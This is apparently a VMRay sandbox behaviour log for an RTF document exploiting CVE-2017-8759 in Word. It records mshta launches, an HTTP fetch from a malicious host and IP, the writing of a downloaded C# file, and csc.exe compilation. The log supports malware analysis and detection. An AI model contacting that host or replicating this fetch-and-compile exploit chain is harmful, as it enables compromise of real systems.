RTF Doc. Uses CVE-2017-8759 Exploit to Execute Code | Sequential Behavior
Try VMRay Analyzer
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:31, Reason: Analysis Target |
| Unmonitor | End Time: 00:02:36, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:05 |
| Information | Value |
|---|---|
| PID | 0x9b0 |
| Parent PID | 0x52c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A68
0x
A64
0x
A54
0x
A30
0x
A2C
0x
A28
0x
A24
0x
A20
0x
9F4
0x
9DC
0x
9D0
0x
9CC
0x
9C4
0x
9BC
0x
9B4
0x
B04
0x
B08
0x
B0C
0x
B18
0x
B24
0x
B28
0x
B2C
0x
B54
0x
B58
0x
B5C
0x
0
0x
B60
0x
B64
0x
B68
0x
BD0
0x
BD4
0x
95C
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\desktop\logo.cs | 1.07 KB (1098 bytes) |
MD5:
667a8968a36880dc4147d2ce00c64b30
SHA1: 48233228f9babdd3bcac5b85d5ae258f91204f7e SHA256: 8aea15951d21f30f44a8d7499472b62473203959659eeb2b9059b64698deacfd |
|
|
| c:\users\aetadzjz\appdata\local\temp\91rxrejg.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\91rxrejg.err | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\91rxrejg.0.cs | 1.08 KB (1101 bytes) |
MD5:
3992ea6c0751d769815a98c4cffcadce
SHA1: 6ba244d7eb6a6facd2b4c4e946e26987d2336e8b SHA256: b12a34c289c97db64f4267e5c67b70f4fefedfe28ae6527e7721a6ef3e4e0adc |
|
|
| c:\users\aetadzjz\appdata\local\temp\91rxrejg.cmdline | 0.28 KB (288 bytes) |
MD5:
8d42a6a6ddda3cb8546ef4cb888dbfa8
SHA1: 2024365b4311bc93867119ceee7c876683fef607 SHA256: f0d80af454b0e9060f13236c0827a4df63d61ac4964a174c999f4aa2895ff00e |
|
|
| c:\users\aetadzjz\appdata\local\temp\91rxrejg.out | 0.37 KB (379 bytes) |
MD5:
51bfb6f473aa25324ee1ed9830ca806e
SHA1: f1fae130030df5b4dff15ed820ca35665886ea98 SHA256: 60a57285c3ccbfa3f03f050681e54c27de4ef1766fe6151104a919b7f7c8fa2e |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\com\SOAPAssembly\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\com\SOAPAssembly, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\com, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows, type = file_attributes |
|
1 | |
| File | Create Directory | C:\Windows\system32\com\SOAPAssembly |
|
1 | |
| System | Get Info | type = Operating System |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\COM+ SOAP Services |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll, type = file_attributes |
|
1 | |
| Process | Create | process_name = C:\Windows\System32\mshta.exe, show_window = SW_SHOWNORMAL |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\com\SOAPAssembly\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\com\SOAPAssembly, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\com, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows, type = file_attributes |
|
1 | |
| File | Create Directory | C:\Windows\system32\com\SOAPAssembly |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\COM+ SOAP Services |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll, type = file_attributes |
|
1 | |
| Process | Create | process_name = C:\Windows\System32\mshta.exe, show_window = SW_SHOWNORMAL |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\com\SOAPAssembly\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\com\SOAPAssembly, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\com, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows, type = file_attributes |
|
1 | |
| File | Create Directory | C:\Windows\system32\com\SOAPAssembly |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\COM+ SOAP Services |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\COM+ SOAP Services |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll, type = file_attributes |
|
1 | |
| Process | Create | process_name = C:\Windows\System32\mshta.exe, show_window = SW_SHOWNORMAL |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 1459 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 0 |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Program Files\Microsoft Office\root\Office16\WINWORD.config, type = file_attributes |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Module | Map | process_name = c:\program files\microsoft office\root\office16\winword.exe, desired_access = FILE_MAP_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
2 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| DNS | Resolve Name | host = www.samyrai777m.p-host.in, address_out = 185.211.244.133 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 185.211.244.133, remote_port = 80 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 92, size_out = 92 |
|
1 | |
| Inet | Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = www.samyrai777m.p-host.in, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /t/tp.php?thread=0 |
|
1 | |
| Inet | Send HTTP Request | headers = host: www.samyrai777m.p-host.in, connection: Keep-Alive, url = www.samyrai777m.p-host.in/t/tp.php?thread=0 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4096, size_out = 1240 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 1240 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\Desktop\Logo.cs, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop\Logo.cs, type = file_type |
|
2 | |
| File | Write | filename = C:\Users\aETAdzjz\Desktop\Logo.cs, size = 1098 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\Desktop\Logo.cs, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop\Logo.cs, type = file_type |
|
2 | |
| File | Read | filename = C:\Users\aETAdzjz\Desktop\Logo.cs, size = 4096, size_out = 1098 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\Desktop\Logo.cs, size = 950, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\Desktop\Logo.cs, size = 4096, size_out = 0 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.tmp, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.tmp, type = file_type |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.0.cs, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.0.cs, type = file_type |
|
2 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.0.cs, size = 1101 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline, type = file_type |
|
2 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline, size = 288 |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.out, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
